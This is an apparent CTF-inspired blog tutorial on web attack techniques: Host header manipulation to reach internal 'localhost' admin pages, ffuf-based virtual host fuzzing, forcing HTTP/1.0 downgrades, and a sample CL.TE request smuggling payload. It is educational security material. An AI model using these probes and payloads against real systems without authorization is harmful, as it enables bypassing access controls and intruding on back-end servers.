HTTP Host Headers, Virtual Host, and HTTP Downgrading oh my!

CTFs are a great way to learn, and that is exactly what I have been doing. Lately I have been digging into HTTP Host header manipulation, virtual hosts, and HTTP downgrading. Let's talk about what I've learned!

Virtual hosts are a ubiquitous and awesome way to serve multiple websites from a single IP address, with each virtual host getting its own domain name. The server tells them apart using the Host header: it acts as an identifier for the different virtual hosts that share one IP. As one might expect, this header can be manipulated to reach otherwise blocked web servers and hack websites.
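
To see this in action, imagine two sites sharing one IP (the address and domain names here are hypothetical placeholders). The only thing that changes between the two requests is the Host header:

curl http://203.0.113.10/ -H "Host: site-a.example"
curl http://203.0.113.10/ -H "Host: site-b.example"

Same IP, two different websites, all decided by that one header.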

Our first culprit is the classic localhost (or 127.0.0.1). If a web server uses the Host header to route traffic to its internal web servers, then setting it to localhost can grant access to a back-end web server that shouldn't be reachable from the outside. It might look something like this:

GET /admin HTTP/1.1
Host: localhost
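
The same probe is easy to send with curl (examplewebsite.com is just a stand-in for your target):

curl -v http://examplewebsite.com/admin -H "Host: localhost"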

Of course this trick can be used against many different endpoints, and testing multiple endpoints (being thorough) is essential. With that in mind, be sure to test every port you found during asset discovery, since virtual hosts may live on different ports such as 80, 443, etc. Asset discovery is also where you find the virtual host names themselves: a tool like ffuf can be essential to finding virtual hosts on an IP. Here's what a command like that might look like:

ffuf -u http://examplewebsite.com/ -w /path/to/wordlist/Common.txt -H "Host: FUZZ"

This fuzzes the Host header with candidate virtual host names from the wordlist; any response that differs from the server's default suggests you've found a real virtual host you can then use in your Host header manipulation. Building a good wordlist can be essential to accessing web servers that host many virtual hosts.
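
One practical tip: most guesses will return the server's default page, so you'll want to filter that baseline out. ffuf's -fs flag filters responses by size; assuming the default page happened to be 4242 bytes, the command would become:

ffuf -u http://examplewebsite.com/ -w /path/to/wordlist/Common.txt -H "Host: FUZZ" -fs 4242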

Another tactic you can use to try to bypass web servers is HTTP downgrading, which is exactly what it sounds like. There have of course been multiple HTTP versions: 0.9, 1.0, 1.1, and 2.0. HTTP downgrading is forcing a conversation with a web server down from something like 2.0 to 1.1, 1.0, or even potentially 0.9! This can allow the hacker to do something called request smuggling (sneaking a hidden request past the front-end server so the back-end web server interprets it differently). Some might think that HTTP 2.0 protects against request smuggling, but web servers that rewrite incoming requests to HTTP/1.1 for their back ends can still have this issue if not configured correctly. You can easily do HTTP downgrading with a curl request that might look like this:

curl -v --http1.0 -X POST examplewebsite.com

This sends a POST request over HTTP/1.0, and forcing the downgraded version might expose behavior (different parsing, headers, or error handling) that the server shouldn't reveal.
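
To make the request smuggling idea concrete, here is the shape of the classic CL.TE payload (a sketch, assuming a front end that trusts Content-Length and a back end that trusts Transfer-Encoding; SMUGGLED is just a placeholder prefix for the hidden request):

POST / HTTP/1.1
Host: examplewebsite.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

The front end forwards all of this as one request, while the back end sees the chunked body end at the 0 and treats SMUGGLED as the beginning of the next request on that connection.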

These techniques aren't overly complicated, nor are they super hard to execute, but they can be devastatingly effective when used on the right endpoints. As always: RECON, RECON, RECON. The more information you have, the better equipped you'll be to find these issues.

I hope you enjoyed this article and it taught you something! Let me know if you have questions and of course, Hack The Planet!!

BlackCatt



